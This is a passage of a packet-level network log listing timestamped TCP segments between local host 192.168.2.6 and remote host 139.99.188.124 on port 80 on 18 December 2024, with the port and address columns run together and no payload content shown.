                                                                    Dec 18, 2024 09:19:25.405149937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405230999 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405306101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.405545950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405658960 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.405725956 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.406750917 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.406842947 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.407809973 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.407881975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.407979012 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.408957005 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.408972025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.408994913 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.409034967 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.410039902 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.410160065 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.410293102 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.411175013 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.411273003 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.411333084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.412544012 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.412693977 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.413644075 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.413683891 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.413705111 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.413759947 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.414568901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.414632082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.414729118 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.415654898 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.415712118 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.415903091 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.416737080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.416837931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.417186022 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.417872906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.417975903 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.418267965 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.418967962 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.428356886 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.428534031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.428842068 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.428854942 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.429075956 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.429172993 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.429224968 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.429285049 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.430326939 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.430469036 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.430507898 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.431302071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.431446075 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.431746006 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.432439089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.432559967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.432662964 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.433568001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.433603048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.434705019 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.434791088 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.434902906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.435132027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.435786963 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.435892105 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.436496973 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.436902046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.437056065 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.438040018 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.438110113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.438249111 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.439160109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.439229965 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.439269066 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.439336061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.440278053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.440332890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.440402985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.441356897 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.441513062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.441746950 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.442522049 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.442574024 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.443615913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.443658113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.443720102 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.443793058 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.444755077 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.444864035 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.444991112 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.445808887 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.445981026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.446083069 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.446963072 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.447098017 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.447251081 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.448081970 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.448204041 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.448246002 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.449245930 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.449301004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.450385094 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.450421095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.450515985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.450515985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.451457977 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.451510906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.451590061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.452575922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.452691078 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.452750921 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.453685999 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.453846931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.453937054 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.454869986 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.454922915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.454999924 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.455894947 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.456013918 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.456161022 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.457041025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.457171917 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.458152056 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.458203077 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.458271027 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.458869934 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.459409952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.459445000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.459563017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.460361958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.460488081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.460640907 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.461503029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.461608887 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.462654114 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.462706089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.462742090 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.463942051 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.464142084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.464150906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.464307070 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.464843988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.464960098 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.465012074 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.465964079 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.466078997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.466223955 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.467150927 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.467185020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.467982054 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.468193054 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.468305111 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.469320059 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.469516993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.469779968 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.470449924 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.470493078 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.470550060 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.470854044 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.471564054 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.471647024 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.471781969 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.596195936 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.596261978 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.596472025 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.596734047 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.596821070 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.597063065 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.597860098 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.597978115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.598150015 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.598985910 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.599071980 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.599211931 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.600121021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.600214958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.600461960 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.601193905 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.601320982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.601442099 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.602355003 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.602480888 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.602669001 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.603506088 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.603621960 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.603684902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.604573965 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.604661942 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.604710102 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.605674982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.605760098 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.605887890 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.606784105 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.606868029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.606925964 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.607908964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.608012915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.608263016 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.609035015 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.609154940 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.609220982 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.610111952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.619386911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.619498968 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.619520903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.619961023 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.620065928 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.620234966 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.620310068 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.620443106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.621380091 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.621464014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.621521950 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.622421980 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.622503042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.622646093 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.623501062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.623512983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.623632908 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.624598026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.624727964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.624794960 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.625754118 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.625873089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.626035929 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.626832962 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.626924038 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.627022028 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.627938986 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.628062010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.628137112 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.629075050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.629312038 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.629384995 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.630186081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.630256891 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.630364895 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.631285906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.631397009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.631525040 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.632411957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.632510900 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.632649899 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.633543015 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.633649111 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.633713961 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.634670019 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.634790897 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.634900093 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.635759115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.635831118 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.635900021 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.636920929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.636992931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.637058020 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.638051033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.638098955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.638207912 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.639216900 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.639327049 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.639404058 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.640240908 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.640374899 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.640435934 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.641350985 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.641536951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.641693115 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.642498016 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.642595053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.642673016 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.644093037 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644164085 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644438982 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.644774914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644877911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.644999027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.645869970 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.645966053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.646055937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.647026062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.647038937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.647095919 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.648077011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.648087978 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.648135900 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.649161100 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.649291992 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.649386883 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.650312901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.650401115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.650500059 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.651444912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.651518106 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.651603937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.652518034 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.652595997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.652692080 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.653654099 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.653747082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.653886080 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.654763937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.654860020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.654969931 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.655875921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.655973911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.656153917 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.657001972 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.657114029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.657232046 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.658179045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.658278942 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.658425093 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.659241915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.659358025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.659456015 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.660393000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.660475969 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.660643101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.661461115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.661562920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.661655903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.662581921 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.662651062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.662708044 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.787514925 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.787528038 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.787698030 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.788048029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.788157940 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.788362980 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.789171934 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.789283991 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.789578915 CET4973880192.168.2.6139.99.188.124
